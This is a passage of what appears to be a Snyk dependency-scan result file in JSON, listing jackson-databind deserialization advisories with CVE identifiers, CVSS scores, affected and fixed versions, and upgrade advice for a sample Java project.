to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.2, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2387)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2389)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2395)\n- [Snyk Blog](https://snyk.io/blog/jackson-deserialization-vulnerability/)\n", + "epssDetails": { + "percentile": "0.83638", + "probability": "0.00984", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14379" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-6fpp-rgj9-8rwc", + "GHSA-gwp4-hfv6-p7hw" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-07-29T14:55:33.030000Z", + "functions_new": [ + { + "version": [ + "[2.9.0,2.9.9.2)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-07-29T12:40:42Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-07-29T12:40:42Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.502907Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467014", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.10)", + "[2.7.0,2.8.11.5)", + "[,2.6.7.3)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10", + "2.8.11.5", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.pr2)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/73c1c2cc76e6cdd7f3a5615cbe3207fe96e4d3db", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2449", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:54.800234Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:53.931793Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:42.808389Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:54.800234Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:53.931793Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered as `com.zaxxer.hikari.HikariDataSource` was not blocked.\r\n**Note:** This is a different vulnerability than CVE-2019-14540.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/73c1c2cc76e6cdd7f3a5615cbe3207fe96e4d3db)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2449)\n", + "epssDetails": { + "percentile": "0.71702", + "probability": "0.00342", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-16335" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-85cw-hj65-qqv9" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-09-16T13:03:06.837179Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.pr2)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-09-15T23:30:24Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-09-16T23:30:24Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:53.931793Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467015", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", + "credit": [ + "iSafeBlue" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.10)", + "[2.7.0,2.8.11.5)", + "[,2.6.7.3)" + ] + }, + "exploit": "Functional", + "fixedIn": [ + "2.9.10", + "2.8.11.5", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0.pr2)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/LeadroyaL/cve-2019-14540-exploit", + "title": "Exploit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2410", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:47.850814Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:54.008832Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:42.892322Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:47.850814Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.008832Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered as `com.zaxxer.hikari.HikariConfig` was not blocked.\r\n**Note:** This is a different vulnerability than CVE-2019-16335.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [Exploit](https://github.com/LeadroyaL/cve-2019-14540-exploit)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2410)\n", + "epssDetails": { + "percentile": "0.74104", + "probability": "0.00410", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14540" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-h822-r4r5-v8jg" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-09-16T13:03:10.401907Z", + "functions_new": [ + { + "version": [ + "[,2.10.0.pr2)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-09-15T23:27:25Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Functional", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-09-16T23:27:25Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.008832Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467016", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Tatu Saloranta" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.10)", + "[2.7.0,2.8.11.5)", + "[,2.6.7.3)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10", + "2.8.11.5", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.10.0.pr1,2.10.0.pr2)", + "[,2.9.10)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2420", + "title": "GitHub Issue" + } + ], + "cvssDetails": [], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:32.899468Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.cxf.jaxrs.provider.XSLTJaxbProvider`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2420)\n", + "epssDetails": null, + "identifiers": { + "CVE": [], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-09-16T14:43:42.115110Z", + "functions_new": [ + { + "version": [ + "[2.10.0.pr1,2.10.0.pr2)", + "[,2.9.10)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-09-16T14:37:38Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-09-16T14:37:37Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-06T13:58:32.899468Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-469674", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "bsmali4" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.10.1)", + "[2.7.0,2.8.11.5)", + "[,2.6.7.3)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.1", + "2.8.11.5", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2478", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:52:13.688214Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:53.988000Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:50.462784Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:13.688214Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:53.988000Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered within `org.apache.commons.dbcp.datasources.SharedPoolDataSource` was not blocked. An attacker could leverage this gadget type to perform Remote Code Execution attacks through deserialization.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2478)\n", + "epssDetails": { + "percentile": "0.73908", + "probability": "0.00404", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-16942" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-mx7p-6679-8g3q" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-10-02T08:02:18.178548Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-10-01T17:43:33Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-10-02T17:43:33Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:53.988000Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-469676", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "bsmali4" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.10.1)", + "[2.7.0,2.8.11.5)", + "[,2.6.7.3)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.1", + "2.8.11.5", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": 